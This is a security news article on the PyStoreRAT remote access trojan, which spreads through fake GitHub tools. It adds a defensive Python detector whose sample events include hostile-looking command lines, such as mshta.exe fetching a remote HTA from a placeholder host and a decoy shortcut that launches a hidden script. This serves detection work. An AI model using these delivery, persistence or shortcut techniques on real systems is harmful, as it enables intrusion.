SECURITY
A new report out today from endpoint security firm Morphisec Inc. details a previously undocumented malware family dubbed “PyStoreRAT” that abuses trusted open-source platforms and Windows scripting features to establish remote access on infected systems.
A JavaScript-based remote access trojan, PyStoreRAT is delivered through lightweight Python and JavaScript loader stubs hidden inside GitHub-hosted repositories that appear to be legitimate developer tools or open-source intelligence utilities.
The malicious repositories are often visually convincing, with polished README files, AI-generated graphics and simulated functionality that lure victims into running a few lines of loader code. Once executed, the loader downloads a remote HTML Application (.hta) file and launches it with the native Windows mshta.exe utility, so the core malware never exists as a traditional executable on disk during the initial stages of infection.
Once up and running, PyStoreRAT profiles the infected system, including collecting host identity information, operating system telemetry, installed security tools and privilege levels before registering with a command-and-control server.
The malware is also built to avoid notice: its check-in uses a session-based handshake that returns a unique authentication token, which makes the command-and-control traffic harder to detect.
Morphisec’s research found that PyStoreRAT includes targeted evasion logic designed to detect CrowdStrike Falcon and other security processes, altering its execution path if it believes it is under observation. It also establishes persistence by creating a scheduled task disguised as an “NVIDIA App SelfUpdate” process that runs every 10 minutes or at user login, so the implant survives a simple system restart.
Under the hood, the command framework of PyStoreRAT is highly modular and supports downloading and executing payloads across multiple formats, including executables, DLLs, MSI installers, PowerShell scripts, Python archives and additional HTA files.
PyStoreRAT can also spread over USB drives for lateral movement: it replaces legitimate files on removable media with malicious shortcut (.lnk) files that first execute the malware and then open the expected document.
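The mshta.exe first stage, the disguised scheduled task and the USB shortcut trick each leave a distinct telemetry footprint that a defender can hunt for. The following detector is an added example written for this article, not code from Morphisec or from the malware itself; it runs those three checks over constructed Sysmon-style event records. The URL, the HTA and LNK paths, the drive letter and the assumed-benign NVIDIA App install path are placeholders chosen for illustration.

```python
"""
Added example, not Morphisec's or PyStoreRAT's code: three behavioural
checks for the PyStoreRAT infection chain described in the report, run over
constructed process-creation, scheduled-task and shortcut-file events.
  Rule 1: mshta.exe launched with a remote HTA URL (fileless first stage).
  Rule 2: a task named like "NVIDIA App SelfUpdate" whose action is a script
          host or whose arguments reference an HTA / remote URL (persistence).
  Rule 3: a .lnk on a removable drive that poses as a document but launches a
          script host (USB propagation: run the malware, then open the file).
All event records at the bottom are constructed sample data, not real logs.
"""
import re
from dataclasses import dataclass

# Script/living-off-the-land hosts the chain relies on (python/JS loaders, mshta).
SCRIPT_HOSTS = {
    "mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
    "python.exe", "pythonw.exe", "cmd.exe", "rundll32.exe",
}
REMOTE_URL = re.compile(r"\bhttps?://\S+", re.IGNORECASE)
HTA_IN_ARGS = re.compile(r"\.hta\b", re.IGNORECASE)
# Task name reported by Morphisec, matched loosely so spacing/case variants hit.
LURE_TASK_NAME = re.compile(r"nvidia\s*app\s*self\s*update", re.IGNORECASE)
DOC_EXTENSIONS = (".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".txt")


@dataclass(frozen=True)
class Finding:
    rule: str
    event_id: int
    detail: str


def _basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path, surrounding quotes stripped."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: dict) -> list[Finding]:
    """Rule 1: mshta.exe pulling an HTA over HTTP(S) instead of opening a local file."""
    if _basename(ev.get("image", "")) != "mshta.exe":
        return []
    url = REMOTE_URL.search(ev.get("cmdline", ""))
    if url:
        return [Finding("mshta_remote_hta", ev["id"], f"mshta.exe fetched {url.group(0)}")]
    return []


def check_task(ev: dict) -> list[Finding]:
    """Rule 2: updater-looking task name, but the action is a script host or points at an HTA/URL."""
    if not LURE_TASK_NAME.search(ev.get("name", "")):
        return []
    action = _basename(ev.get("action", ""))
    args = ev.get("args", "")
    if action in SCRIPT_HOSTS or HTA_IN_ARGS.search(args) or REMOTE_URL.search(args):
        return [Finding("lure_task_nvidia_selfupdate", ev["id"],
                        f"task '{ev['name']}' runs {action} {args}".strip())]
    return []


def check_lnk(ev: dict) -> list[Finding]:
    """Rule 3: document-named .lnk on removable media whose target is a script host."""
    if not ev.get("removable") or not ev.get("path", "").lower().endswith(".lnk"):
        return []
    stem = ev["path"].lower()[:-4]  # drop ".lnk": "e:\q3-report.pdf.lnk" -> "e:\q3-report.pdf"
    if not stem.endswith(DOC_EXTENSIONS):
        return []
    if _basename(ev.get("target", "")) in SCRIPT_HOSTS:
        return [Finding("usb_lnk_doc_decoy", ev["id"],
                        f"{ev['path']} -> {ev['target']} {ev.get('args', '')}".strip())]
    return []


def scan(events: list[dict]) -> list[Finding]:
    """Dispatch each event to the check for its type and collect all findings in order."""
    handlers = {"process": check_process, "task": check_task, "lnk": check_lnk}
    findings: list[Finding] = []
    for ev in events:
        findings.extend(handlers.get(ev.get("type"), lambda _e: [])(ev))
    return findings


# Constructed sample telemetry. Hosts, URLs and paths are placeholders, not observed IOCs.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta.exe https://update.example.invalid/stage2.hta"},
    {"id": 2, "type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\help.hta"'},  # local HTA: outside rule 1
    {"id": 3, "type": "task", "name": "NVIDIA App SelfUpdate",
     "action": r"C:\Windows\System32\mshta.exe", "args": r"C:\Users\Public\Libraries\upd.hta",
     "trigger": "every 10 minutes; at logon"},
    {"id": 4, "type": "task", "name": "NVIDIA App SelfUpdate",  # assumed-benign updater path
     "action": r"C:\Program Files\NVIDIA Corporation\NVIDIA app\NVIDIA app.exe", "args": "--update"},
    {"id": 5, "type": "lnk", "path": r"E:\Q3-report.pdf.lnk", "removable": True,
     "target": r"C:\Windows\System32\wscript.exe",
     "args": r'//e:jscript "E:\.cache\s.js" "E:\Q3-report.pdf"'},
    {"id": 6, "type": "lnk", "path": r"E:\Q3-report.pdf.lnk", "removable": False,
     "target": r"C:\Windows\System32\wscript.exe", "args": ""},  # fixed disk: outside rule 3
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_id}: {f.detail}")
```

Run against the samples, events 1, 3 and 5 are flagged and the rest pass. Rule 2 deliberately keys on what the task does rather than on the name alone, since a real NVIDIA updater task would otherwise produce false positives; rule 3 is scoped to removable media because that is the only propagation path the report describes.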
“PyStoreRAT represents a shift toward modular, script-based implants that can adapt to security controls and deliver multiple payload formats,” explains Morphisec researcher and report author Yonatan Edri. “Its use of HTA/JS for execution, Python loaders for delivery and Falcon-aware evasion logic creates a stealthy first-stage foothold that traditional endpoint detection and response solutions detect only late in the infection chain.”